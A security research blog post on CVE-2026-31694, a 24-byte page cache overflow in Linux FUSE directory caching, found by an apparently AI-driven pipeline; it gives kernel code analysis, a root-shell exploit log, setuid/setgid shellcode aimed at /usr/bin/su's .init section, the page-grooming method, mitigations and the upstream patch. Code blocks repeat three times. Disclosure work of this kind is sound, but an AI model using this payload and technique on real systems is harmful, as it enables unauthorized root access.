Discovery & Validation in the Linux Kernel (Part 2): FUSE Page Cache Overflow

Samuel Page

Last time we discussed the goal for this three-part series and analysed how our LLM-driven pipeline at Bynario was able to discover and validate CVE-2026-31532, a use-after-free in the Linux kernel's Controller Area Network (CAN) module.

In this part, we'll move on to another kernel bug our pipeline surfaced this month: CVE-2026-31694, a page cache overflow in the kernel's Filesystem in Userspace (FUSE) subsystem. We'll follow a similar format to part 1 by starting with a technical analysis of the vulnerability, then discuss validation, impact, remediation and wrap up with some final thoughts.

For this bug, the pipeline generated a working local privilege escalation, leveraging the page cache overflow primitive to gain root privileges on Ubuntu 26.04, which we'll explore too!

Our pipeline uses a mix of models, but for this case, Opus 4.6 was the primary model involved in discovery and validation, highlighting how "older" models can still generate complex exploits when properly harnessed. The vulnerability was discovered while analysing the 7.0 Linux kernel, all snippets, unless otherwise specified, refer to this version.

CVE-2026-31694: Page Cache Overflow in fs/fuse

Background

Filesystem in Userspace (FUSE) is a userspace filesystem framework. It consists of a kernel module (fuse.ko), a userspace library (libfuse.*) and a mount utility (fusermount) [4].

A key feature of FUSE is allowing secure, unprivileged mounts of user-defined filesystems. This is achieved by splitting filesystem logic between the kernel and a userspace process, with a well-defined communication channel.

At a high level, the kernel component (fuse.ko) registers a virtual filesystem and exposes a character device (/dev/fuse). When a FUSE filesystem is mounted, a FUSE "server" is created and becomes responsible for handling filesystem operations.

It does this via a bidirectional request–reply protocol over /dev/fuse, where:

  • the kernel acts as a client, issuing filesystem requests

  • the FUSE server/daemon acts as the server, implementing filesystem semantics.

So essentially the kernel carries out the filesystem tasks, as with any other filesystem, but it communicates with the FUSE server, which defines the implementation details for filesystem operations.

An example of such a filesystem operation would be when a userspace process calls getdents64() on a FUSE directory, an fs system call to fetch directory entries.

In this case the kernel sends a request to the FUSE server for its directory entries, which returns a buffer of struct fuse_dirent records, which looks like this:

// include/uapi/linux/fuse.h
struct fuse_dirent {
  uint64_t	ino;     // inode number
  uint64_t	off;     // offset for next entry
  uint32_t	namelen; // length of the name
  uint32_t	type;    // file type (regular, dir, etc.)
  char name[];       // filename (variable length)
};
// include/uapi/linux/fuse.h
struct fuse_dirent {
  uint64_t	ino;     // inode number
  uint64_t	off;     // offset for next entry
  uint32_t	namelen; // length of the name
  uint32_t	type;    // file type (regular, dir, etc.)
  char name[];       // filename (variable length)
};
// include/uapi/linux/fuse.h
struct fuse_dirent {
  uint64_t	ino;     // inode number
  uint64_t	off;     // offset for next entry
  uint32_t	namelen; // length of the name
  uint32_t	type;    // file type (regular, dir, etc.)
  char name[];       // filename (variable length)
};

The buffer is simply an array of these dynamically sized directory entries. To compute the size of a given record, and thus index the array, FUSE defines FUSE_DIRENT_SIZE():

// include/uapi/linux/fuse.h
#define FUSE_NAME_OFFSET offsetof(struct fuse_dirent, name)
#define FUSE_DIRENT_SIZE(d) \
	FUSE_DIRENT_ALIGN(FUSE_NAME_OFFSET + (d)->namelen)
// include/uapi/linux/fuse.h
#define FUSE_NAME_OFFSET offsetof(struct fuse_dirent, name)
#define FUSE_DIRENT_SIZE(d) \
	FUSE_DIRENT_ALIGN(FUSE_NAME_OFFSET + (d)->namelen)
// include/uapi/linux/fuse.h
#define FUSE_NAME_OFFSET offsetof(struct fuse_dirent, name)
#define FUSE_DIRENT_SIZE(d) \
	FUSE_DIRENT_ALIGN(FUSE_NAME_OFFSET + (d)->namelen)

We can see an example of the FUSE kernel code iterating over this buffer (buf) here:

// fs/fuse/readdir.c
static int parse_dirfile(char *buf, size_t nbytes, struct file *file,
			 struct dir_context *ctx)
{
	while (nbytes >= FUSE_NAME_OFFSET) {
		struct fuse_dirent *dirent = (struct fuse_dirent *) buf;
		size_t reclen = FUSE_DIRENT_SIZE(dirent);
		if (!dirent->namelen || dirent->namelen > FUSE_NAME_MAX)
			return -EIO;
		if (reclen > nbytes)
			break;
		if (memchr(dirent->name, '/', dirent->namelen) != NULL)
			return -EIO;

		if (!fuse_emit(file, ctx, dirent))
			break;

		buf += reclen;
		nbytes -= reclen;
		ctx->pos = dirent->off;
	}

	return 0;
}
// fs/fuse/readdir.c
static int parse_dirfile(char *buf, size_t nbytes, struct file *file,
			 struct dir_context *ctx)
{
	while (nbytes >= FUSE_NAME_OFFSET) {
		struct fuse_dirent *dirent = (struct fuse_dirent *) buf;
		size_t reclen = FUSE_DIRENT_SIZE(dirent);
		if (!dirent->namelen || dirent->namelen > FUSE_NAME_MAX)
			return -EIO;
		if (reclen > nbytes)
			break;
		if (memchr(dirent->name, '/', dirent->namelen) != NULL)
			return -EIO;

		if (!fuse_emit(file, ctx, dirent))
			break;

		buf += reclen;
		nbytes -= reclen;
		ctx->pos = dirent->off;
	}

	return 0;
}
// fs/fuse/readdir.c
static int parse_dirfile(char *buf, size_t nbytes, struct file *file,
			 struct dir_context *ctx)
{
	while (nbytes >= FUSE_NAME_OFFSET) {
		struct fuse_dirent *dirent = (struct fuse_dirent *) buf;
		size_t reclen = FUSE_DIRENT_SIZE(dirent);
		if (!dirent->namelen || dirent->namelen > FUSE_NAME_MAX)
			return -EIO;
		if (reclen > nbytes)
			break;
		if (memchr(dirent->name, '/', dirent->namelen) != NULL)
			return -EIO;

		if (!fuse_emit(file, ctx, dirent))
			break;

		buf += reclen;
		nbytes -= reclen;
		ctx->pos = dirent->off;
	}

	return 0;
}

Note that an entry's namelen is limited to 4095 as defined by FUSE_NAME_MAX:

// fs/fuse/fuse_i.h
/* maximum, but needs a request buffer > FUSE_MIN_READ_BUFFER */
#define FUSE_NAME_MAX (PATH_MAX - 1)
// fs/fuse/fuse_i.h
/* maximum, but needs a request buffer > FUSE_MIN_READ_BUFFER */
#define FUSE_NAME_MAX (PATH_MAX - 1)
// fs/fuse/fuse_i.h
/* maximum, but needs a request buffer > FUSE_MIN_READ_BUFFER */
#define FUSE_NAME_MAX (PATH_MAX - 1)

FUSE filesystems can influence kernel behaviour through flags and configuration options exchanged as part of the FUSE protocol. One such option is FOPEN_CACHE_DIR, which can be set by the FUSE server in response to an opendir request.

When this flag is enabled, the kernel caches directory entries returned by the FUSE server so that subsequent readdir operations can be handled by the kernel, without having to issue requests to the userspace FUSE server, via /dev/fuse, for cached entries.

FUSE's directory caching is implemented by copying the parsed struct fuse_dirent records into the kernel's page cache.

The page cache is an in-memory cache for filesystem data; for example when a file is first read from disk, its contents are stored in the cache. Typically, reads and writes all go through the page cache first before trying slower disk access. As the name suggests, it is organised into fixed-size memory "pages", typically 4096 (PAGE_SIZE) on x86_64 systems.

FUSE's directory caching implementation allows multiple directory entries to be cached within a single page, but any single entry must fit within a single page.

Analysis

With (hopefully) sufficient background covered, let's take a look at the vulnerability, which lies in fuse_add_dirent_to_cache(). This function is responsible for adding a directory entry to the page cache, when using the FOPEN_CACHE_DIR flag:

// fs/fuse/readdir.c
static void fuse_add_dirent_to_cache(struct file *file,
				     struct fuse_dirent *dirent, loff_t pos)
{
	struct fuse_inode *fi = get_fuse_inode(file_inode(file));
	size_t reclen = FUSE_DIRENT_SIZE(dirent);  // [1]
	pgoff_t index;
	struct page *page;
	loff_t size;
	u64 version;
	unsigned int offset;
	void *addr;

	spin_lock(&fi->rdc.lock);
	/*
	 * Is cache already completed?  Or this entry does not go at the end of
	 * cache?
	 */
	if (fi->rdc.cached || pos != fi->rdc.pos) {
		spin_unlock(&fi->rdc.lock);
		return;
	}
	version = fi->rdc.version;
	size = fi->rdc.size;
	offset = size & ~PAGE_MASK;
	index = size >> PAGE_SHIFT;
	/* Dirent doesn't fit in current page?  Jump to next page. */
	if (offset + reclen > PAGE_SIZE) {      // [2]
		index++;
		offset = 0;                         // [3]
	}
	spin_unlock(&fi->rdc.lock);

	if (offset) {
		page = find_lock_page(file->f_mapping, index);
	} else {
		page = find_or_create_page(file->f_mapping, index,
					   mapping_gfp_mask(file->f_mapping));
	}
	if (!page)
		return;

	spin_lock(&fi->rdc.lock);
	/* Raced with another readdir */
	if (fi->rdc.version != version || fi->rdc.size != size ||
	    WARN_ON(fi->rdc.pos != pos))
		goto unlock;

	addr = kmap_local_page(page);
	if (!offset) {
		clear_page(addr);
		SetPageUptodate(page);
	}
	memcpy(addr + offset, dirent, reclen);  // [4]
	kunmap_local(addr);
	fi->rdc.size = (index << PAGE_SHIFT) + offset + reclen;
	fi->rdc.pos = dirent->off;
unlock:
	spin_unlock(&fi->rdc.lock);
	unlock_page(page);
	put_page(page);
}
// fs/fuse/readdir.c
static void fuse_add_dirent_to_cache(struct file *file,
				     struct fuse_dirent *dirent, loff_t pos)
{
	struct fuse_inode *fi = get_fuse_inode(file_inode(file));
	size_t reclen = FUSE_DIRENT_SIZE(dirent);  // [1]
	pgoff_t index;
	struct page *page;
	loff_t size;
	u64 version;
	unsigned int offset;
	void *addr;

	spin_lock(&fi->rdc.lock);
	/*
	 * Is cache already completed?  Or this entry does not go at the end of
	 * cache?
	 */
	if (fi->rdc.cached || pos != fi->rdc.pos) {
		spin_unlock(&fi->rdc.lock);
		return;
	}
	version = fi->rdc.version;
	size = fi->rdc.size;
	offset = size & ~PAGE_MASK;
	index = size >> PAGE_SHIFT;
	/* Dirent doesn't fit in current page?  Jump to next page. */
	if (offset + reclen > PAGE_SIZE) {      // [2]
		index++;
		offset = 0;                         // [3]
	}
	spin_unlock(&fi->rdc.lock);

	if (offset) {
		page = find_lock_page(file->f_mapping, index);
	} else {
		page = find_or_create_page(file->f_mapping, index,
					   mapping_gfp_mask(file->f_mapping));
	}
	if (!page)
		return;

	spin_lock(&fi->rdc.lock);
	/* Raced with another readdir */
	if (fi->rdc.version != version || fi->rdc.size != size ||
	    WARN_ON(fi->rdc.pos != pos))
		goto unlock;

	addr = kmap_local_page(page);
	if (!offset) {
		clear_page(addr);
		SetPageUptodate(page);
	}
	memcpy(addr + offset, dirent, reclen);  // [4]
	kunmap_local(addr);
	fi->rdc.size = (index << PAGE_SHIFT) + offset + reclen;
	fi->rdc.pos = dirent->off;
unlock:
	spin_unlock(&fi->rdc.lock);
	unlock_page(page);
	put_page(page);
}
// fs/fuse/readdir.c
static void fuse_add_dirent_to_cache(struct file *file,
				     struct fuse_dirent *dirent, loff_t pos)
{
	struct fuse_inode *fi = get_fuse_inode(file_inode(file));
	size_t reclen = FUSE_DIRENT_SIZE(dirent);  // [1]
	pgoff_t index;
	struct page *page;
	loff_t size;
	u64 version;
	unsigned int offset;
	void *addr;

	spin_lock(&fi->rdc.lock);
	/*
	 * Is cache already completed?  Or this entry does not go at the end of
	 * cache?
	 */
	if (fi->rdc.cached || pos != fi->rdc.pos) {
		spin_unlock(&fi->rdc.lock);
		return;
	}
	version = fi->rdc.version;
	size = fi->rdc.size;
	offset = size & ~PAGE_MASK;
	index = size >> PAGE_SHIFT;
	/* Dirent doesn't fit in current page?  Jump to next page. */
	if (offset + reclen > PAGE_SIZE) {      // [2]
		index++;
		offset = 0;                         // [3]
	}
	spin_unlock(&fi->rdc.lock);

	if (offset) {
		page = find_lock_page(file->f_mapping, index);
	} else {
		page = find_or_create_page(file->f_mapping, index,
					   mapping_gfp_mask(file->f_mapping));
	}
	if (!page)
		return;

	spin_lock(&fi->rdc.lock);
	/* Raced with another readdir */
	if (fi->rdc.version != version || fi->rdc.size != size ||
	    WARN_ON(fi->rdc.pos != pos))
		goto unlock;

	addr = kmap_local_page(page);
	if (!offset) {
		clear_page(addr);
		SetPageUptodate(page);
	}
	memcpy(addr + offset, dirent, reclen);  // [4]
	kunmap_local(addr);
	fi->rdc.size = (index << PAGE_SHIFT) + offset + reclen;
	fi->rdc.pos = dirent->off;
unlock:
	spin_unlock(&fi->rdc.lock);
	unlock_page(page);
	put_page(page);
}

Note that reclen (1) is derived from FUSE_DIRENT_SIZE(dirent), where dirent is supplied by the FUSE server / userspace (i.e. attacker-controlled).

Let's have another look at how FUSE_DIRENT_SIZE(dirent) calculates the length here:

  • FUSE_DIRENT_SIZE(dirent) = FUSE_DIRENT_ALIGN(FUSE_NAME_OFFSET + dirent->namelen)

  • Where FUSE_NAME_OFFSET, the offset of the name field, is 24 bytes

  • And FUSE_DIRENT_ALIGN aligns records to 8 bytes

  • dirent->namelen as we saw is capped by FUSE_NAME_MAX, which is 4095 bytes

  • This makes the maximum reclen = FUSE_DIRENT_ALIGN(24 + 4095) = 4120

In other words, it is possible for a malicious FUSE server to supply a directory entry with a reclen > PAGE_SIZE on systems with 4096 byte pages.

If we go back to fuse_add_dirent_to_cache() we see it handles the case where a dirent doesn't fit in the remaining space of the current page (2):

	/* Dirent doesn't fit in current page?  Jump to next page. */
	if (offset + reclen > PAGE_SIZE) {      // [2]
		index++;
		offset = 0;                         // [3]
	}
	// ...
	addr = kmap_local_page(page);
	if (!offset) {
		clear_page(addr);
		SetPageUptodate(page);
	}
	memcpy(addr + offset, dirent, reclen);  // [4]
	/* Dirent doesn't fit in current page?  Jump to next page. */
	if (offset + reclen > PAGE_SIZE) {      // [2]
		index++;
		offset = 0;                         // [3]
	}
	// ...
	addr = kmap_local_page(page);
	if (!offset) {
		clear_page(addr);
		SetPageUptodate(page);
	}
	memcpy(addr + offset, dirent, reclen);  // [4]
	/* Dirent doesn't fit in current page?  Jump to next page. */
	if (offset + reclen > PAGE_SIZE) {      // [2]
		index++;
		offset = 0;                         // [3]
	}
	// ...
	addr = kmap_local_page(page);
	if (!offset) {
		clear_page(addr);
		SetPageUptodate(page);
	}
	memcpy(addr + offset, dirent, reclen);  // [4]

However, in this case, it assumes it will fit into a fresh page, so resets the offset (3) and proceeds to copy reclen bytes into a new page (4). With a reclen of 4120 bytes, this leads to a 24 byte (4120 - PAGE_SIZE) overflow past the page cache page.

Validation

So, how did our pipeline validate this vulnerability was really there? By popping a root shell of course! In this section, I'm going to explore the approach the validator took to leverage this 24 byte page cache overflow into a local privilege escalation (LPE) on Ubuntu 26.04.

$ uname -a
Linux fuse-test 7.0.0-14-generic #14-Ubuntu SMP PREEMPT_DYNAMIC Mon Apr 13 11:09:53 UTC 2026 x86_64 GNU/Linux
$ id
uid=1000(user) gid=1000(user) groups=1000(user),27(sudo)
$ cat /etc/os-release | head -3
PRETTY_NAME="Ubuntu 26.04 LTS"
NAME="Ubuntu"
VERSION_ID="26.04"
$ ./exploit
=== FUSE LPE PoC ===
FUSE readdir page-cache overflow -> SUID binary corruption

[*] Running as uid=1000 gid=1000
[+] Target: /usr/bin/su (.init on page 3)
[*] Payload:  f3 0f 1e fa 31 ff 6a 69 58 0f 05 6a 6a 58 0f 05 c3 90 90 90 90 90 00
[*] Original: f3 0f 1e fa 48 83 ec 08 48 8b 05 c1 af 00 00 48 85 c0 74 02 ff d0 48 83

[*] Creating 48 sacrificial files...
[*] Priming page cache (24 rounds)...
[*] Page cache primed

[*] Starting exploit (up to 512 attempts, sweeping PCP pad 0..6)...

[*] Attempt 1 (pad=0): miss (absorbed=0)
[*] Attempt 2 (pad=1): miss (absorbed=0)
[*] Attempt 3 (pad=2): miss (absorbed=0)
[*] Attempt 4 (pad=3): miss (absorbed=0)
[*] Attempt 5 (pad=4): miss (absorbed=0)
[*] Attempt 6 (pad=5): miss (absorbed=0)
[*] Attempt 7 (pad=6): miss (absorbed=0)
[*] Attempt 25 (pad=3): miss (absorbed=0)
[*] Attempt 42 (pad=6): HIT!

========================================
[!!!] .init PAGE CORRUPTED
========================================

[*] Corrupted: f3 0f 1e fa 31 ff 6a 69 58 0f 05 6a 6a 58 0f 05 c3 90 90 90 90 90 00 00

[*] Executing corrupted /usr/bin/su to verify LPE...

[+] LPE successful:
uid=0(root) gid=0(root) groups=0(root)
root

=== root shell ===
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
$ uname -a
Linux fuse-test 7.0.0-14-generic #14-Ubuntu SMP PREEMPT_DYNAMIC Mon Apr 13 11:09:53 UTC 2026 x86_64 GNU/Linux
$ id
uid=1000(user) gid=1000(user) groups=1000(user),27(sudo)
$ cat /etc/os-release | head -3
PRETTY_NAME="Ubuntu 26.04 LTS"
NAME="Ubuntu"
VERSION_ID="26.04"
$ ./exploit
=== FUSE LPE PoC ===
FUSE readdir page-cache overflow -> SUID binary corruption

[*] Running as uid=1000 gid=1000
[+] Target: /usr/bin/su (.init on page 3)
[*] Payload:  f3 0f 1e fa 31 ff 6a 69 58 0f 05 6a 6a 58 0f 05 c3 90 90 90 90 90 00
[*] Original: f3 0f 1e fa 48 83 ec 08 48 8b 05 c1 af 00 00 48 85 c0 74 02 ff d0 48 83

[*] Creating 48 sacrificial files...
[*] Priming page cache (24 rounds)...
[*] Page cache primed

[*] Starting exploit (up to 512 attempts, sweeping PCP pad 0..6)...

[*] Attempt 1 (pad=0): miss (absorbed=0)
[*] Attempt 2 (pad=1): miss (absorbed=0)
[*] Attempt 3 (pad=2): miss (absorbed=0)
[*] Attempt 4 (pad=3): miss (absorbed=0)
[*] Attempt 5 (pad=4): miss (absorbed=0)
[*] Attempt 6 (pad=5): miss (absorbed=0)
[*] Attempt 7 (pad=6): miss (absorbed=0)
[*] Attempt 25 (pad=3): miss (absorbed=0)
[*] Attempt 42 (pad=6): HIT!

========================================
[!!!] .init PAGE CORRUPTED
========================================

[*] Corrupted: f3 0f 1e fa 31 ff 6a 69 58 0f 05 6a 6a 58 0f 05 c3 90 90 90 90 90 00 00

[*] Executing corrupted /usr/bin/su to verify LPE...

[+] LPE successful:
uid=0(root) gid=0(root) groups=0(root)
root

=== root shell ===
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
$ uname -a
Linux fuse-test 7.0.0-14-generic #14-Ubuntu SMP PREEMPT_DYNAMIC Mon Apr 13 11:09:53 UTC 2026 x86_64 GNU/Linux
$ id
uid=1000(user) gid=1000(user) groups=1000(user),27(sudo)
$ cat /etc/os-release | head -3
PRETTY_NAME="Ubuntu 26.04 LTS"
NAME="Ubuntu"
VERSION_ID="26.04"
$ ./exploit
=== FUSE LPE PoC ===
FUSE readdir page-cache overflow -> SUID binary corruption

[*] Running as uid=1000 gid=1000
[+] Target: /usr/bin/su (.init on page 3)
[*] Payload:  f3 0f 1e fa 31 ff 6a 69 58 0f 05 6a 6a 58 0f 05 c3 90 90 90 90 90 00
[*] Original: f3 0f 1e fa 48 83 ec 08 48 8b 05 c1 af 00 00 48 85 c0 74 02 ff d0 48 83

[*] Creating 48 sacrificial files...
[*] Priming page cache (24 rounds)...
[*] Page cache primed

[*] Starting exploit (up to 512 attempts, sweeping PCP pad 0..6)...

[*] Attempt 1 (pad=0): miss (absorbed=0)
[*] Attempt 2 (pad=1): miss (absorbed=0)
[*] Attempt 3 (pad=2): miss (absorbed=0)
[*] Attempt 4 (pad=3): miss (absorbed=0)
[*] Attempt 5 (pad=4): miss (absorbed=0)
[*] Attempt 6 (pad=5): miss (absorbed=0)
[*] Attempt 7 (pad=6): miss (absorbed=0)
[*] Attempt 25 (pad=3): miss (absorbed=0)
[*] Attempt 42 (pad=6): HIT!

========================================
[!!!] .init PAGE CORRUPTED
========================================

[*] Corrupted: f3 0f 1e fa 31 ff 6a 69 58 0f 05 6a 6a 58 0f 05 c3 90 90 90 90 90 00 00

[*] Executing corrupted /usr/bin/su to verify LPE...

[+] LPE successful:
uid=0(root) gid=0(root) groups=0(root)
root

=== root shell ===
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root

Alright, there's a lot to unpack here (not least of which is the glaring lack of ASCII art). First, we get a brief overview of the technique being used here: "FUSE readdir page-cache overflow -> SUID binary corruption", so let's start by expanding on that.

The vulnerability allows us to overflow whatever physically follows our page cache page in memory with up to 24 bytes of attacker-controlled data. Naturally, other page cache pages are allocated via the same API so are likely nearby in memory, making them an easy target.

So what can these pages actually contain? What are we corrupting here? As discussed earlier, reads and writes go via the cache first. This includes binaries: when we execute a binary, we map it into memory and then execute it. These bytes are typically read from the cache copy first, so if we can corrupt the cache copy, we can execute these corrupted bytes.

I'm sure you can see where this is going! If we're able to corrupt the cached bytes of a Set User ID (SUID) binary, that runs with root privileges, we get a nice arbitrary code execution primitive. As we can see a bit later in the log, the validator uses /usr/bin/su for this:

[+] Target: /usr/bin/su (.init on page 3)
[*] Payload:  f3 0f 1e fa 31 ff 6a 69 58 0f 05 6a 6a 58 0f 05 c3 90 90 90 90 90 00
[*] Original: f3 0f 1e fa 48 83 ec 08 48 8b 05 c1 af 00 00 48 85 c0 74 02 ff d0 48 83
[+] Target: /usr/bin/su (.init on page 3)
[*] Payload:  f3 0f 1e fa 31 ff 6a 69 58 0f 05 6a 6a 58 0f 05 c3 90 90 90 90 90 00
[*] Original: f3 0f 1e fa 48 83 ec 08 48 8b 05 c1 af 00 00 48 85 c0 74 02 ff d0 48 83
[+] Target: /usr/bin/su (.init on page 3)
[*] Payload:  f3 0f 1e fa 31 ff 6a 69 58 0f 05 6a 6a 58 0f 05 c3 90 90 90 90 90 00
[*] Original: f3 0f 1e fa 48 83 ec 08 48 8b 05 c1 af 00 00 48 85 c0 74 02 ff d0 48 83

But what do we corrupt in order to get code execution with our 24 byte overflow, which allows us to corrupt the first 24 bytes of a cached page? The proof-of-concept (PoC) targets the .init section of the SUID ELF binary, which contains initialization code executed automatically by the dynamic linker before the program reaches main(). Perfect!

static const uint8_t payload[CONTROLLED_BYTES] = {
	0xf3, 0x0f, 0x1e, 0xfa,        /* endbr64                        */
	0x31, 0xff,                     /* xor edi, edi       ; rdi = 0   */
	0x6a, 0x69,                     /* push 0x69                      */
	0x58,                           /* pop rax            ; rax = 105 */
	0x0f, 0x05,                     /* syscall            ; setuid(0) */
	0x6a, 0x6a,                     /* push 0x6a                      */
	0x58,                           /* pop rax            ; rax = 106 */
	0x0f, 0x05,                     /* syscall            ; setgid(0) */
	0xc3,                           /* ret                            */
	0x90, 0x90, 0x90, 0x90, 0x90,
};
static const uint8_t payload[CONTROLLED_BYTES] = {
	0xf3, 0x0f, 0x1e, 0xfa,        /* endbr64                        */
	0x31, 0xff,                     /* xor edi, edi       ; rdi = 0   */
	0x6a, 0x69,                     /* push 0x69                      */
	0x58,                           /* pop rax            ; rax = 105 */
	0x0f, 0x05,                     /* syscall            ; setuid(0) */
	0x6a, 0x6a,                     /* push 0x6a                      */
	0x58,                           /* pop rax            ; rax = 106 */
	0x0f, 0x05,                     /* syscall            ; setgid(0) */
	0xc3,                           /* ret                            */
	0x90, 0x90, 0x90, 0x90, 0x90,
};
static const uint8_t payload[CONTROLLED_BYTES] = {
	0xf3, 0x0f, 0x1e, 0xfa,        /* endbr64                        */
	0x31, 0xff,                     /* xor edi, edi       ; rdi = 0   */
	0x6a, 0x69,                     /* push 0x69                      */
	0x58,                           /* pop rax            ; rax = 105 */
	0x0f, 0x05,                     /* syscall            ; setuid(0) */
	0x6a, 0x6a,                     /* push 0x6a                      */
	0x58,                           /* pop rax            ; rax = 106 */
	0x0f, 0x05,                     /* syscall            ; setgid(0) */
	0xc3,                           /* ret                            */
	0x90, 0x90, 0x90, 0x90, 0x90,
};

We can see the payload used by the PoC simply calls setuid(0), setgid(0) then returns, with execution continuing as normal. Let's check the man page for su:

DESCRIPTION
       su allows commands to be run with a substitute user and group ID.

       When called with no user specified, su defaults to running an interactive
       shell as

DESCRIPTION
       su allows commands to be run with a substitute user and group ID.

       When called with no user specified, su defaults to running an interactive
       shell as

DESCRIPTION
       su allows commands to be run with a substitute user and group ID.

       When called with no user specified, su defaults to running an interactive
       shell as

Normally, running su as an unprivileged user to get a root shell requires authentication. However, as we've already set our user ID and group ID to root in the init, we bypass those checks and can jump straight to a root shell, ezpz.

However, anyone familiar with memory corruption and exploit development will know it's not usually just as easy as simply placing the memory I want to corrupt where I want it.

There's a few considerations at play here:

  • We need to be mindful of noise, other parts of the kernel are going to be allocating memory at the same time we are. We want to avoid corrupting the wrong memory.

  • We need to consider the page cache's implementation, how do we get our SUID binary added and removed from the cache on demand from userspace?

So how did the validator go about tackling the memory heap feng shui required here?

To achieve LPE the page physically adjacent to the oversized, cached FUSE dirent must be the .init page of the target SUID binary, su in this case.

First, the validator creates a "sacrificial file pool" (its name choice) of temporary files, which are repeatedly faulted (via pread) into and evicted (via posix_fadvise(FADV_DONTNEED)) from the page cache, creating a grouped set of "sprayed" cached pages.

At the same time, it repeatedly faults and evicts a two-page window around the target .init section - the .init page itself and the preceding page. The goal is to have our sacrificial pages and the su pages adjacent in memory.

Then, just before triggering the bug, the page prior to the .init section and several sacrificial pages (for padding), are evicted to create some holes in memory. When the bug is triggered, the oversized dirent page should land in one of these gaps, ideally the one prior to the target .init page, allowing us to land our payload. Failing that, due to the sacrificial pages, we are likely to corrupt one of these instead of something important.

Impact

The vulnerable code was introduced in commit 69e34551152a ("fuse: allow caching readdir") on 2018-10-01. That change added fuse_add_dirent_to_cache() and the current page cache packing logic. However, practical reachability depends on whether the kernel issues READDIR requests larger than one page.

Before commit dabb90391028 ("fuse: increase readdir buffer size", 2025-04-08), fuse_readdir_uncached() only allocated a PAGE_SIZE reply buffer, which prevents a 4120-byte malicious dirent from being accepted by the kernel at all, meaning the vulnerability first becomes practically reachable in v6.16-rc1.

The overflow size is deterministic (up to 24 bytes on 4 KiB pages) and the overflow contents are attacker-controlled bytes from the filename tail. Note systems which have a page size larger than 4 KiB are unaffected as the 4120-byte malicious dirent will not overflow.

On affected systems, an unprivileged local attacker can mount a FUSE filesystem (via unprivileged user namespaces or using fusermount3), return an oversized directory entry from the FUSE server, and trigger the vulnerable path via a getdents64() syscall.

Besides applying the patch below, this vulnerability, and the attack surface exposed by FUSE, can be limited by restricting access to FUSE if not required on your system.

  • On systems with fusermount3, you can strip the setuid bit via sudo chmod u-s /usr/bin/fusermount3 if it's not in use.

  • Ensure unprivileged namespaces are disabled/restricted suitably for your distribution (see the impact section of our last post for more on this)

Remediation

After validating the bug, the following patch was proposed and accepted upstream:

From 51a8de6c50bf947c8f534cd73da4c8f0a13e7bed Mon Sep 17 00:00:00 2001
From: Samuel Page <sam@bynar.io>
Date: Mon, 20 Apr 2026 11:01:37 +0200
Subject: [PATCH] fuse: reject oversized dirents in page cache

fuse_add_dirent_to_cache() computes a serialized dirent size from the
server-controlled namelen field and copies the dirent into a single
page-cache page. The existing logic only checks whether the dirent fits
in the remaining space of the current page and advances to a fresh page
if not. It never checks whether the dirent itself exceeds PAGE_SIZE.

As a result, a malicious FUSE server can return a dirent with
namelen=4095, producing a serialized record size of 4120 bytes. On 4 KiB
page systems this causes memcpy() to overflow the cache page by 24 bytes
into the following kernel page.

Reject dirents that cannot fit in a single page before copying them into
the readdir cache.

Fixes: 69e34551152a ("fuse: allow caching readdir")
Cc: stable@vger.kernel.org # v6.16+
Assisted-by: Bynario AI
Signed-off-by: Samuel Page <sam@bynar.io>
Reported-by: Qi Tang <tpluszz77@gmail.com>
Reported-by: Zijun Hu <nightu@northwestern.edu>
Signed-off-by: Miklos Szeredi <mszeredi@redhat.com>
Link: https://patch.msgid.link/20260420090139.662772-1-mszeredi@redhat.com
Signed-off-by: Christian Brauner <brauner@kernel.org>
---
 fs/fuse/readdir.c | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/fs/fuse/readdir.c b/fs/fuse/readdir.c
index c2aae2eef0868b..aae657fd56c0ed 100644
--- a/fs/fuse/readdir.c
+++ b/fs/fuse/readdir.c
@@ -41,6 +41,10 @@ static void fuse_add_dirent_to_cache(struct file *file,
 	unsigned int offset;
 	void *addr;

+	/* Dirent doesn't fit in readdir cache page?  Skip caching. */
+	if (reclen > PAGE_SIZE)
+		return;
+
 	spin_lock(&fi->rdc.lock);
 	/*
 	 * Is cache already completed?  Or this entry does not go at the end of
From 51a8de6c50bf947c8f534cd73da4c8f0a13e7bed Mon Sep 17 00:00:00 2001
From: Samuel Page <sam@bynar.io>
Date: Mon, 20 Apr 2026 11:01:37 +0200
Subject: [PATCH] fuse: reject oversized dirents in page cache

fuse_add_dirent_to_cache() computes a serialized dirent size from the
server-controlled namelen field and copies the dirent into a single
page-cache page. The existing logic only checks whether the dirent fits
in the remaining space of the current page and advances to a fresh page
if not. It never checks whether the dirent itself exceeds PAGE_SIZE.

As a result, a malicious FUSE server can return a dirent with
namelen=4095, producing a serialized record size of 4120 bytes. On 4 KiB
page systems this causes memcpy() to overflow the cache page by 24 bytes
into the following kernel page.

Reject dirents that cannot fit in a single page before copying them into
the readdir cache.

Fixes: 69e34551152a ("fuse: allow caching readdir")
Cc: stable@vger.kernel.org # v6.16+
Assisted-by: Bynario AI
Signed-off-by: Samuel Page <sam@bynar.io>
Reported-by: Qi Tang <tpluszz77@gmail.com>
Reported-by: Zijun Hu <nightu@northwestern.edu>
Signed-off-by: Miklos Szeredi <mszeredi@redhat.com>
Link: https://patch.msgid.link/20260420090139.662772-1-mszeredi@redhat.com
Signed-off-by: Christian Brauner <brauner@kernel.org>
---
 fs/fuse/readdir.c | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/fs/fuse/readdir.c b/fs/fuse/readdir.c
index c2aae2eef0868b..aae657fd56c0ed 100644
--- a/fs/fuse/readdir.c
+++ b/fs/fuse/readdir.c
@@ -41,6 +41,10 @@ static void fuse_add_dirent_to_cache(struct file *file,
 	unsigned int offset;
 	void *addr;

+	/* Dirent doesn't fit in readdir cache page?  Skip caching. */
+	if (reclen > PAGE_SIZE)
+		return;
+
 	spin_lock(&fi->rdc.lock);
 	/*
 	 * Is cache already completed?  Or this entry does not go at the end of
From 51a8de6c50bf947c8f534cd73da4c8f0a13e7bed Mon Sep 17 00:00:00 2001
From: Samuel Page <sam@bynar.io>
Date: Mon, 20 Apr 2026 11:01:37 +0200
Subject: [PATCH] fuse: reject oversized dirents in page cache

fuse_add_dirent_to_cache() computes a serialized dirent size from the
server-controlled namelen field and copies the dirent into a single
page-cache page. The existing logic only checks whether the dirent fits
in the remaining space of the current page and advances to a fresh page
if not. It never checks whether the dirent itself exceeds PAGE_SIZE.

